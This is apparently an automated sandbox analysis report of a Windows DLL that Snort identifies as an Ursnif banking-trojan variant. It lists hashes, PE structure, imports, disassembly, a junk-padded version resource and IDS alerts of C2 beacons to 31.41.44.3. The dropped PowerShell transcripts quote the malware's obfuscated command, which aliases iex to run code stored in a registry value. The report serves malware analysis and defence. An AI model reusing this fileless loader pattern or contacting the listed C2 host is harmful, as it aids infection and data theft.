                  MD5:2FADDE21AC915A4A9759332593B5894B
                  SHA1:7BA553DA8746F9F393FF30BDF945C57B1EBBAA3F
                  SHA-256:7B8F167EADA6230CE4B868460DDB8D11D67B9D8E88352C92125A5BE2EADA8AD0
                  SHA-512:7838CA982E20AD89302DC4557324C8C51B70414A4D84EE3CB75FCD945814FB0664867E79E49EF1E439735FDB591DF8C03ADBCFBF3EADC91CBFD23B3A2B686B32
                  Malicious:false
                  Reputation:unknown
                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20220119115054..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 287400 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([System.Text.Encoding]::ASCII.GetString((einkftwfr HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UrlsReturn))..Process ID: 2176..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220119115054..**********************..PS>new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([
                  C:\Users\user\Documents\20220119\PowerShell_transcript.287400.mbM60WFd.20220119115055.txt
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1359
                  Entropy (8bit):5.396727230652096
                  Encrypted:false
                  SSDEEP:24:BxSATxvBn5x2DOXUW9DLCHq4qWXyHjeTKKjX4CIym1ZJXbDLCHq4zmnxSAZ7C:BZ9vh5oOdwq4tiqDYB1ZRwq4zoZZ7C
                  MD5:E60A686C505972D9DAFA1A0DDE8FE4F7
                  SHA1:775B8DA2955812411BA7F7CC50A398F884A16069
                  SHA-256:DAF983279AD5906392E498368FA8996BE6786465598E843CCBBA5DC6E0F6E448
                  SHA-512:D974119A5FA839A0220A883EECA4B0D3BA73D62BCA4B8E8A92D5541666849D27CEA956596BB45540466D5760413F3A88FCB82295021DF00A35527AA9D8B12A42
                  Malicious:false
                  Reputation:unknown
                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20220119115058..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 287400 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([System.Text.Encoding]::ASCII.GetString((einkftwfr HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UrlsReturn))..Process ID: 1676..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220119115058..**********************..PS>new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([

                  Static File Info

                  General

                  File type:MS-DOS executable, MZ for MS-DOS
                  Entropy (8bit):5.793442977835089
                  TrID:
                  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                  • Generic Win/DOS Executable (2004/3) 0.20%
                  • DOS Executable Generic (2002/1) 0.20%
                  • VXD Driver (31/22) 0.00%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:status.dll
                  File size:1235456
                  MD5:947fe47db34a2654fc7aa76ec2bebec0
                  SHA1:6e2d76945861c48a2e4552d87583c1a70e6525a2
                  SHA256:02bb7e5eda106943c37400103a651d11d1ebfd5f4b0a550874328c2c82340923
                  SHA512:da59273a5782006b2b13012b012db2ddb59441cc7ea3735b355605a29460029f990ec3e25232ab9dc27cf8dad1e27ed4742e4bba1541ca65958d608e38dc6237
                  SSDEEP:24576:a04Q1k7lRM3FymFIz5yfd/N04Q1k7lRM3FymFIz5yfd/N04Q1k7lRM3FymFIz5yE:fXu/MV/INrXu/MV/INrXu/MV/INN9Vz
                  File Content Preview:MZ......................................................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................!.........................@...............................@.......|..................................U..

                  File Icon

                  Icon Hash:74f0e4ecccdce0e4

                  Static PE Info

                  General

                  Entrypoint:0x100017f4
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x10000000
                  Subsystem:windows gui
                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                  DLL Characteristics:
                  Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:7790023abe9e706b7ca9941ca04b698c

                  Entrypoint Preview

                  Instruction
                  mov ecx, 00001935h
                  push 00000000h
                  call dword ptr [10004C08h]
                  mov ecx, eax
                  mov ebx, eax
                  push 10001887h
                  ret
                  lea ecx, dword ptr [ecx+00h]
                  push eax
                  mov esi, dword ptr [ebp+000002ACh]
                  push esi
                  mov eax, dword ptr [10028634h]
                  mov dword ptr [10028B2Ch], 100141B8h
                  call dword ptr [10021024h]
                  mov bl, byte ptr [esp+0Ch]
                  jc 00007F19CC6DD596h
                  and ecx, 81010100h
                  cmp edi, esi
                  pop ebx
                  call 00007F19CC6E2D03h
                  ret
                  pop ebx
                  add esi, 01h
                  xor cl, bl
                  push 00000000h
                  fld qword ptr [eax]
                  pop ebp
                  mov al, byte ptr [esi]
                  jc 00007F19CC6DD596h
                  pop esi
                  add ecx, 01h
                  add ecx, 01h
                  push ebp
                  push eax
                  jc 00007F19CC6DD596h
                  cmp ecx, 08h
                  add dword ptr [eax+468A0147h], ecx
                  jne 00007F19CC6DD596h
                  call dword ptr [10021024h]
                  push eax
                  mov eax, ecx
                  jc 00007F19CC6DD596h
                  push ebp
                  mov ebp, esp
                  add esp, FFFFFFF8h
                  push esi
                  call dword ptr [10004C44h]
                  mov dword ptr [ebp-08h], eax
                  push 10125BEFh
                  call dword ptr [10004DBCh]
                  mov dword ptr [10125C64h], eax
                  push 0000002Bh
                  push eax
                  push dword ptr [10125C38h]
                  push 0000002Ah
                  push dword ptr [10125C58h]
                  push 00000068h

                  Data Directories

                  Name | Virtual Address | Virtual Size | Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x2eda | 0x55 | .text
                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0x4dcc | 0xb4 | .rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x12b000 | 0x746c | .rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x133000 | 0x3c8 | .reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IAT | 0x4b50 | 0x27c | .rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                  Sections

                  Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                  .text | 0x1000 | 0x2def | 0x2e00 | False | 0.634510869565 | data | 6.95280203957 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  .rdata | 0x4000 | 0xe80 | 0x1000 | False | 0.412841796875 | data | 4.43323834069 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data | 0x5000 | 0x1255b0 | 0x121200 | False | 0.707899305556 | data | 5.68912538804 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                  .rsrc | 0x12b000 | 0x746c | 0x7600 | False | 0.307997881356 | data | 3.20109729995 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc | 0x133000 | 0x3c8 | 0x400 | False | 0.8603515625 | data | 6.36587006793 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                  Resources

                  Name | RVA | Size | Type | Language | Country
                  RT_VERSION | 0x12b058 | 0x7414 | data | English | United States

                  Imports

                  DLL | Import
                  advapi32.dll | RegSetValueExW, LookupAccountSidW, GetKernelObjectSecurity, LookupAccountNameW, RegOpenKeyW, RegDeleteKeyW, GetLengthSid, OpenServiceW, RegOpenKeyExW, AdjustTokenPrivileges, CreateServiceW, DeleteService, CloseServiceHandle, SetServiceStatus, RegCloseKey, OpenSCManagerW, IsValidSid, RegCreateKeyW, OpenThreadToken, DuplicateTokenEx, RegQueryValueExW, SetThreadToken, GetTokenInformation, StartServiceCtrlDispatcherW, OpenProcessToken, RegisterServiceCtrlHandlerExW, LookupPrivilegeValueW
                  dbghelp.dll | MiniDumpWriteDump
                  kernel32.dll | VerifyVersionInfoW, HeapDestroy, DeleteCriticalSection, FormatMessageW, SetConsoleScreenBufferSize, SetEvent, FreeConsole, GetCurrentThread, UnhandledExceptionFilter, QueryPerformanceFrequency, GetStringTypeExA, GetCurrentProcessId, DuplicateHandle, VirtualProtectEx, LoadLibraryA, SetUnhandledExceptionFilter, GetModuleHandleA, InterlockedIncrement, CreateEventW, GetProcAddress, LoadLibraryW, DeviceIoControl, AllocConsole, InterlockedExchange, DeleteFileW, LocalFree, WriteFile, lstrlenW, InterlockedDecrement, GetComputerNameA, RaiseException, GetCommandLineW, GetModuleFileNameA, IsProcessorFeaturePresent, CreateFileW, TerminateProcess, HeapFree, WideCharToMultiByte, GetModuleHandleW, HeapCreate, DebugBreak, GetLastError, GetTickCount, WaitForSingleObject, GetProcessHeap, SetConsoleMode, ReadConsoleInputW, FreeLibrary, GetModuleFileNameW, InitializeCriticalSectionAndSpinCount, GetTempPathW, CreateThread, CloseHandle, LeaveCriticalSection, GetNumberOfConsoleInputEvents, HeapAlloc, CreateFileA, InterlockedExchangeAdd, SetFilePointer, GetVersionExW, Sleep, OutputDebugStringW, ResumeThread, InitializeCriticalSection, GetCurrentProcess, QueryPerformanceCounter, LCMapStringW, IsDebuggerPresent, HeapReAlloc, VerSetConditionMask, LoadLibraryExW, EnterCriticalSection, GetStdHandle, SetLastError, LocalAlloc, GetCurrentThreadId
                  msvcrt.dll | _vsnwprintf, _onexit, _purecall, wcslen, free, atol, strchr, ?terminate@@YAXXZ, memmove, _initterm, wcscmp, iswspace, _CxxThrowException, wcschr, _beginthreadex, _ultow, sscanf, _vsnprintf, malloc, __CxxFrameHandler, __dllonexit, wcsncpy
                  ntdsapi.dll | DsCrackSpnW
                  ole32.dll | CoQueryProxyBlanket, CoUnmarshalInterface, CoSetProxyBlanket, CoGetClassObject, CoCreateGuid, CoGetCallContext, CoTaskMemAlloc, CoInitializeEx, CoGetMarshalSizeMax, CoImpersonateClient, StringFromGUID2, CoSwitchCallContext, CoInitialize, CoCreateInstance, CoTaskMemFree, CoMarshalInterThreadInterfaceInStream, CoTaskMemRealloc, CoMarshalInterface, CoGetInterfaceAndReleaseStream, CoUninitialize, CoRevertToSelf, CLSIDFromString
                  shlwapi.dll | PathIsRelativeA
                  user32.dll | GetSystemMetrics

                  Exports

                  Name | Ordinal | Address
                  DllRegisterServer | 1 | 0x100012b4

                  Version Infos

                  Description | Data
                  Nonpigmented | Immaterials
                  Suprapubic | Cellose
                  Phenylamide | Caudofemoral
                  Mistrain | Uncorruptly
                  Unoverflowing | Streltzi
                  Ratihabition | Wishedly
                  Immeasurability | Telautomatics
                  Readableness | Placeless
                  Transmogrification | Chimaeroid
                  Protephemeroidea | Indelicateness
                  Smashup | Ductileness
                  Aulophyte | Vannet
                  InternalName | Stonyheartedness
                  Relower | Anabasse
                  Superagrarian | Zingiberaceae
                  Nurturer | Discomfortingly
                  Mythos | Antecedence
                  Alveolary | Boothite
                  Biodynamical | Unbeauteous
                  Harebrainedness | Imputrescible
                  Terroristical | Formicarian
                  Orgiac | Acranial
                  Ideomotor | Mbuba
                  Endomyces | Rewend
                  Inciter | Epiclastic
                  Uncrooking | Procharity
                  Invigilation | Undrossy
                  Harmotomic | Pyrolignous
                  Dungannonite | Cleanish
                  Immaterials | Tawpie
                  Hypertrophied | Triturium
                  Reiterative | Straphanger
                  Nonperforming | Gravure
                  Clomben | Protococcus
                  Platformy | Tylopoda
                  Peripherically | Wildwood
                  Rhacianectes | Cathetometric
                  Euchred | Plaintless
                  Rumal | Outerly
                  Countervote | Delomorphous
                  Postarticular | Untownlike
                  Humbugger | Foreremembered
                  Photocatalyzer | Brachiofacial
                  Conciliator | Hipple
                  Filterman | Nievling
                  Ort | Furiousness
                  Oligonite | Eccentrate
                  Perpetuation | Cheltenham
                  Visceripericardial | Otherhow
                  Antitetanolysin | Sugarlike
                  Pushball | Macrocentrus
                  Hyenanchin | Protoreptilian
                  Pseudofinal | Adnomination
                  Suggester | Misdirect
                  Monoacetate | Ahousaht
                  Rauli | Metastannate
                  Triturium | Pieprint
                  Unstatuesque | Refreshing
                  Uromastix | Structured
                  Unstraight | Eccentrate
                  Puruloid | Gyrostat
                  Machinize | Parametrium
                  Folkright | Therewithin
                  Pinder | Mountaintop
                  Disfranchiser | Carabeen
                  Upgale | Batrachospermum
                  Gainst | Misinterment
                  Dwarfishness | Bespecklement
                  Dogate | Ludicrosplenetic
                  Depositure | Triatoma
                  Peasecod | Outvelvet
                  Tubbeck | Rumenotomy
                  Joggly | Triazane
                  Copartnership | Traducingly
                  Preternaturalism | Characterlessness
                  Kilovar | Whistlingly
                  Subcircuit | Champagneless
                  Chinampa | Eudaemonistical
                  Familia | Sacrocoxitis
                  Ossuary | Powhatan
                  Kail | Logogram
                  Phasmatoidea | Saliniform
                  Thereanent | Uncurtailed
                  Disconcord | Jonathanization
                  Ethylate | Shirlcock
                  Lunt | Reoxygenate
                  Pearten | Adelbert
                  Olecranian | Tutiorism
                  Superregeneration | Disfranchiser
                  Intertragian | Wolfdom
                  Speiss | Heterogenous
                  Winterlike | Rumal
                  Pluckless | Sirenia
                  Sophomorical | Canful
                  Myxobacteria | Hypomanic
                  Babloh | Magism
                  Subnucleus | Blockmaker
                  Pegasean | Chronosemic
                  FileDescription | Epilogical
                  Nonintuitive | Hydrocyst
                  Fragaria | Ostariophysial
                  Quibbleproof | Scryer
                  Selffulness | Unchoral
                  Crookback | Intracanalicular
                  Considerable | Bonce
                  Enhusk | Platysomid
                  Nonselective | Nonconsenting
                  Spiculose | Occurrence
                  FileVersion | 5, 3, 2, 3
                  Phrymaceae | Pelviperitonitis
                  Shaded | Hoarder
                  Levier | Polymythic
                  Eurypharyngidae | Praestomium
                  Unsociable | Matriculable
                  Rougy | Mineralogical
                  Tophaceous | Vassalship
                  Reidentification | Rukbat
                  Encephaloscope | Predacity
                  Intermingle | Uncomfortable
                  Tribeship | Wiseman
                  Birdhouse | Phos
                  Undetrimental | Chlorimetric
                  Masker | Coadventure
                  Nanism | Microspermae
                  Equivote | Rhapsode
                  Amyelonic | Stylize
                  Hyponoia | Zabra
                  Viduation | Mugilidae
                  Subplinth | Wightness
                  Metapsychological | Athrong
                  Anabaptistic | Polyprene
                  Polymathy | Cerumen
                  Antisoporific | Hereamong
                  Survivance | Chilognathan
                  Hask | Apodeipnon
                  Hornotine | Rhabdomonas
                  Evan | Ekron
                  Stagiary | Tampan
                  Macrotherioid | Scribatious
                  Bryozoum | Tabellion
                  Cryolite | Orchichorea
                  Ponderomotive | Sprose
                  Corruptedness | Unignitable
                  Whimsied | Platymeric
                  Desultorious | Ratchelly
                  Theocollectivism | Blepharospasm
                  Punily | Laterotemporal
                  Rah | Mononychous
                  Carditic | Postmeridian
                  Fiddleheaded | Encephaloscope
                  Spoffle | Intersexual
                  Unsoftened | Indophenol
                  Quadrisyllabical | Resolder
                  Waganda | Spaewife
                  Pleurocapsa | Peracute
                  Garawi | Homopathy
                  Dantist | Fusarial
                  Seminovel | Ridiculousness
                  Hyperparasitism | Decipium
                  Prefecundation | Pelopaeus
                  Antipatriarchal | Lygosoma
                  Moonlike | Demagnetize
                  Kaolinate | Eurypharynx
                  Ectodermic | Baselessness
                  Brocked | Shortsome
                  Cantalite | Ladylikeness
                  Acate | Alchemistical
                  Seepweed | Shallowly
                  Mincing | Fenlander
                  Sigilative | Unfilially
                  Organer | Ethicism
                  Allocutive | Semisaltire
                  Persecutor | Loxia
                  Histrionics | Substitutional
                  Myelosyringosis | Diapensia
                  Muster | Cointersecting
                  Strudel | Concessively
                  Unversed | Erotopath
                  Valerin | Overgrossness
                  Lateralis | Platyfish
                  Sirenia | Bretwaldaship
                  Dissentingly | Semimanufacture
                  Overlively | Campulitropal
                  Knavishness | Bryological
                  Stereotaxis | Legless
                  Unframed | Myrrhine
                  Camelidae | Retrorsely
                  Automobilistic | Countersense
                  Micrurgic | Purely
                  Aleuritic | Folletage
                  Forehead | Impeevish
                  Undancing | Tinware
                  Vapocauterization | Boregat
                  Pozzuolanic | Eczematization
                  Corybantish | Mountaintop
                  Enchantment | Disenchantress
                  Archeocyte | Puromucous
                  Biblism | Quiinaceae
                  Arteriorrhagia | Gondite
                  Ductileness | Itchy
                  Entente | Refinement
                  Astronomize | Moriform
                  Aswell | Dedicator
                  Receipts | Satellitium
                  Adiabatically | Ungelt
                  Trior | Zabra
                  Leucophyllous | Lihyanite
                  Tucuna | Actinotrichium
                  Amnestic | Semiahmoo
                  Mesalike | Goujon
                  Porphyroblastic | Dietics
                  Wheeldom | Zoanthacea
                  Ultravirtuous | Younghearted
                  Mortifiedness | Seemless
                  Overcarry | Alectoropodous
                  Planeting | Abie
                  Amyotrophia | Obloquial
                  Ruefulness | Gyrostat
                  Unredeemable | Crednerite
                  Limu | Gymnasiast
                  Cylindrocellular | Meekhearted
                  Unctorium | Uncontrite
                  Amylon | Akov
                  Unguinal | Alosa
                  Bulbaceous | Aurodiamine
                  Basidiomycete | Alcoholization
                  Renunciant | Limer
                  Gyroceras | Snoozle
                  Nycticorax | Honeyful
                  Batrachospermum | Ohmage
                  Extensile | Supervisorial
                  Peucites | Babloh
                  Reinforcer | Timpani
                  Rugby | Reactionaryism
                  Moriform | Aeromotor
                  Retrogradism | Echinus
                  Emersed | Haymow
                  Penthoraceae | Unversed
                  Hexagynia | Unbirdlimed
                  Microcosmal | Hask
                  Acanthodea | Unactuated
                  Inanimadvertence | Hemiteratics
                  Flinter | Viverridae
                  Adrenalone | Oreocarya
                  Typical | Prosthetist
                  Geniture | Humite
                  Griquaite | Semic
                  Perimetritic | Snakebark
                  Superstrong | Guiltily
                  Uredinoid | Unexhaustible
                  Siluric | Trombe
                  Chiaroscurist | Temporality
                  Sawhorse | Alvus
                  Maddingly | Athecata
                  Zoomechanics | Shoddylike
                  Aeolist | Vertebrofemoral
                  Hypermystical | Sinlessness
                  Caurale | Handhaving
                  Ilia | Libroplast
                  Azotoluene | Rattan
                  Hungrily | Unoffensive
                  Strainproof | Waka
                  Phytobiological | Whalm
                  Subjudge | Increaseful
                  Downway | Pseudogryphus
                  Restes | Presentimental
                  Heliograph | Entremets
                  Plex | Rhacianectes
                  Biochemistry | Hydrocephalous
                  Outlance | Multiradiate
                  Towmast | Cirrigrade
                  Ungual | Glossingly
                  Sinologer | Maximon
                  Pagedom | Masticura
                  Laryngitic | Awd
                  Unenacted | Octennially
                  Deadheadism | Brownweed
                  Sexivalency | Areocentric
                  Cyanoplastid | Artistical
                  Uninerved | Rah
                  Epidote | Churr
                  Perceivable | Heterogenous
                  Galvanolysis | Ensue
                  Orthodoxically | Helvellaceae
                  Unheard | Hemiteratics
                  Retrofract | Sensibilia
                  Trichosporangium | Eupraxia
                  Enochic | Prelusory
                  Conglobation | Platymeric
                  Pinmaker | Kaffiyeh
                  Quippish | Bipedality
                  Skullful | Haggardness
                  Sensation | Dactylopterus
                  Soldierhearted | Apodema
                  Caliciform | Crome
                  Disinterestedly | Allanturic
                  Cubicovariant | Tawpie
                  Dacryosolenitis | Cheirosophy
                  DextrallyClerkdom
                  VoltameterOutgallop
                  PeridermiumBedright
                  DoeskinBilocular
                  CaressantUndismayed
                  SubtlistElasmobranch
                  ObeUnlevelness
                  PluckerianCystitis
                  PollenivorousPedipulation
                  SongySubjudge
                  KiladjaSkinning
                  CholesterateHogreeve
                  TebethTemporoauricular
                  PortraitlikeQuibbleproof
                  ColthoodUnegoist
                  ZaxOrnithosaur
                  AmylaseStringways
                  UnswungPrecentress
                  TinwarePachyblepharon
                  MesosternumOrrhoid
                  FavositoidPhyllodial
                  TambourerSimpletonish
                  AdenoidNonprohibitive
                  IntracollegiateMasterwork
                  IntensativeScrounging
                  PlanillaUnalliable
                  TeutophilePrepupal
                  LymphangiectaticTautochronism
                  PreacquittalPrecollect
                  PotamologyGrubstreet
                  ScoukSimpletonish
                  CheirosophyWheretoever
                  TautochronismDuctileness
                  TramlessMedicamentally
                  UnhuskedBiomicroscopy
                  LemographyResolidification
                  MultiradiateAngioparesis
                  IngressHousemaidenly
                  BandakaRenunciant
                  StrumpetryYancopin
                  HydroscopePincerlike
                  UnrememberHarlotry
                  UncelestializedRespersive
                  PhylacterySeepweed
                  SnakebarkMesofurcal
                  BleaklyPersecutor
                  DiversificationZoocarp
                  PrecompilationFutileness
                  PucklikeAthamantid
                  UnequitableCraspedon
                  DartinglyWhirled
                  TrophotaxisEurypharynx
                  StereobaticCaricous
                  DupableXanthomonas
                  DummeredBalancement
                  PlatymericCornein
                  ApiologistSlangy
                  CollateralnessPrecipitancy
                  PurbeckianThyrohyal
                  TomialIsothere
                  DaunterFrangibility
                  InauspiciousnessPlaintless
                  PuglianitePanneuritis
                  TrencherwiseLimu
                  BlitterEndomyces
                  AndrophyllHeterogenous
                  OphiopluteusSupersalesman
                  BarbarityDemagnetize
                  DibenzylHexachloroethane
                  RichdomFormicine
                  UpshutPhilotechnic
                  GirrAilanthic
                  RomanceishnessDryadetum
                  CeroliteAdoptionist
                  HippocentaurEchinus
                  CherubimicScowler
                  NomophylaxProbabl
                  AlkaligenDothiorella
                  MeetenNidal
                  PolypragmonicOedipean
                  LectualMachinization
                  StereoplasmicFolkright
                  WuduPesach
                  DistinctivenessZax
                  DonacidaeAgrogeological
                  PlatypodaDicarbonate
                  BushelmanAntioxygen
                  AlosaPunnology
                  ManualismCatadioptric
                  AwnerOsmous
                  SinglebarNiklesite
                  ImaginableIntrastromal
                  ThoroughwortEupraxia
                  UnwroughtManualism
                  ExesImprecant
                  MisascribeCheirosophy
                  SalicornDrusy
                  MuckiteMopane
                  OvarinCarking
                  MachinizationDogate
                  TritonessLobbyer
                  NiecelessCupseed
                  UndermimicStraitlacedness
                  OsGascon
                  PlethodontidaeCalyptorhynchus
                  MesonephridiumHispaniolate
                  AlytesUpscrew
                  HydrocystScoldingly
                  InfraconsciousDwarfishness
                  UnbirdlimedRoentgenize
                  ArmamentariumTillamook
                  PermissibilityPristis
                  FoodyZambal
                  NonpoisonousNaturelike
                  SuperabstractUnanalytical
                  PertusedPremillennialist
                  LogogramBorotungstic
                  SydneyiteStonyheartedness
                  DiscomfortinglyUnexcelling
                  SkeeHylist
                  NuculidPanneuritis
                  IsopicramicTrochantin
                  ProlificlyAmpullaria
                  PlagiaristicallySpirivalve
                  PyrolignousPolyact
                  ShemakaStaghunt
                  MammondomBurgrave
                  TrispermousHyblan
                  ZosmaEudaemonistical
                  DoctorshipPresentimental
                  LeucaurinNonoriginal
                  WappingProfessionalism
                  ViroleUnadornable
                  ConversationalistManualism
                  PteroclomorphicBulbaceous
                  AgalacticDiscursativeness
                  NoddyScrubber
                  HexaplaricSoldanelle
                  OvergodlySlantingly
                  SarcosporidUnlevelness
                  FleshenAlgometer
                  CuirBucconidae
                  SynarchicalRhacianectes
                  TemporoauricularGemellione
                  IndeterminablyNonenforceable
                  PerfectistBalaamite
                  UnshadyReinjure
                  UncommunicatedWardapet
                  TeaberryBiopyribole
                  ImperforatedAzoxybenzoic
                  DraffBothnian
                  CalcographyAboriginary
                  AnaschisticAnacidity
                  SemimythicalMyelotherapy
                  MolluscoideanReasonless
                  PredrawerCloisteral
                  XiphydriaUnsmokeable
                  PeripateticateAktivist
                  HenhussySenijextee
                  BadgerbrushUndenominationalize
                  NatroliteBewhig
                  FistulatedTaiyal
                  DemigorgeOvidae
                  MoineauKeratoplastic
                  GeoteuthisRefinable
                  TetanillaAzotoluene
                  LubricatorOptable
                  MbubaAlehoof
                  PrivateBuildCollophore
                  LogopedicsDipterous
                  ReabuseParasternal
                  OverloveCheeseflower
                  PendragonshipHornotine
                  CampanulariaePregladness
                  CompanyNameOrganoleptic
                  UnoffensiveOrlo
                  OssianizeSpotlessness
                  ScrolledCarbamic
                  NonoriginalTraction
                  BrachycranialAmblycephalidae
                  SpanemyOncetta
                  EvermoreAlosa
                  RashnessYan
                  UnderstandabilityDealership
                  LessnLessn
                  MultimetallismZabra
                  SowanLaudation
                  FabianistEntomological
                  MedicamentallyMesosternum
                  CryptogrammaUnspellable
                  HyphalIdiosepiidae
                  PictoriallyUnstraight
                  FrangibilityUnshady
                  FischeriteSepiary
                  MentorismUncommunicated
                  BiggHaruspex
                  SupershipmentMensural
                  VariotintedUnspeakable
                  BannetUnsoftened
                  UgaronoDivesture
                  WahpetonAlaskaite
                  OssifluentCurettage
                  FibrochondrostealInsequent
                  UnpeckedMashona
                  AccentuationSerapias
                  AinsellPopularly
                  TemporalityUnripeness
                  MethodicalnessDelomorphous
                  StraphangerFowler
                  TernaEquiponderant
                  ThiazoleHydrocele
                  IsoelectronicEncyrtidae
                  AcrocarpiOutshove
                  ShGravelweed
                  CetomorphicSubdatary
                  ScroungingProvivisectionist
                  Translation0x0409 0x04e4

Possible Origin

Language of compilation system | Country where language is spoken
English | United States

This is derived from the Translation entry of the version resource, 0x0409 0x04e4: language ID 0x0409 is en-US and 0x04e4 is code page 1252 (Windows Latin-1). It records what the resource compiler was told on the build machine, not where the operator is, and the rest of that version resource is filled with random dictionary-word key/value pairs around the only real keys (PrivateBuild, CompanyName, Translation), so it is a weak signal at best.

                  Network Behavior

                  Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
01/19/22-11:50:27.788887 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49748 | 80 | 192.168.2.3 | 31.41.44.3
01/19/22-11:50:30.910903 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49751 | 80 | 192.168.2.3 | 31.41.44.3
01/19/22-11:50:30.910903 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49751 | 80 | 192.168.2.3 | 31.41.44.3
01/19/22-11:50:32.709523 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49752 | 80 | 192.168.2.3 | 31.41.44.3
01/19/22-11:50:32.735750 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49754 | 80 | 192.168.2.3 | 31.41.44.3
01/19/22-11:50:32.735750 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49754 | 80 | 192.168.2.3 | 31.41.44.3
01/19/22-11:50:33.094544 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49751 | 80 | 192.168.2.3 | 31.41.44.3
01/19/22-11:50:33.094544 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49751 | 80 | 192.168.2.3 | 31.41.44.3
01/19/22-11:50:34.706245 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49752 | 80 | 192.168.2.3 | 31.41.44.3
01/19/22-11:50:34.932451 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49754 | 80 | 192.168.2.3 | 31.41.44.3
01/19/22-11:50:34.932451 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49754 | 80 | 192.168.2.3 | 31.41.44.3
01/19/22-11:50:36.361098 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49756 | 80 | 192.168.2.3 | 31.41.44.3
